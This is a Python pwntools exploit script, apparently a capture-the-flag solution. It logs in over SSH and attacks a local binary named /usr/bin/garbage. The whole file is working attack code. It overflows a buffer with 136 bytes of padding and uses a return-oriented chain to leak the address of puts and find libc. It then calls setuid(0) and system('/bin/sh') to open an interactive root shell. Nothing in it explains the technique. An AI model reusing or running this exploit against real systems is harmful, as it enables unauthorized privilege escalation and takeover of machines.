exploit.py

from pwn import *
HOST = ''
USER = ''
PASS = ''

s = ssh(host=HOST, user=USER, password=PASS)
p = s.process('/usr/bin/garbage')

context(os="linux",arch="amd64")

plt_main = p64(0x401619)
plt_put = p64(0x401050)
got_put = p64(0x404028)
pop_rdi = p64(0x40179b)
junk = "A"*136

payload = junk + pop_rdi + got_put + plt_put + plt_main
p.sendline(payload)
p.recvuntil("denied.")
leaked_puts = p.recv()[:8].strip().ljust(8,"\x00")
log.success("Leaked puts@GLIBCL: " + str(leaked_puts))
leaked_puts = u64(leaked_puts)

pop_rdi = p64(0x40179b)
libc_put = 0x809c0
libc_sys = 0x4f440
libc_sh = 0x1b3e9a 

offset = leaked_puts - libc_put
sys = p64(offset +  libc_sys)   
sh = p64(offset + libc_sh)
setuid = p64(offset + 0xe5970)

payload = junk + pop_rdi + p64(0x00) + setuid + pop_rdi + sh + sys
p.sendline(payload)
p.recvuntil("denied.")

p.interactive()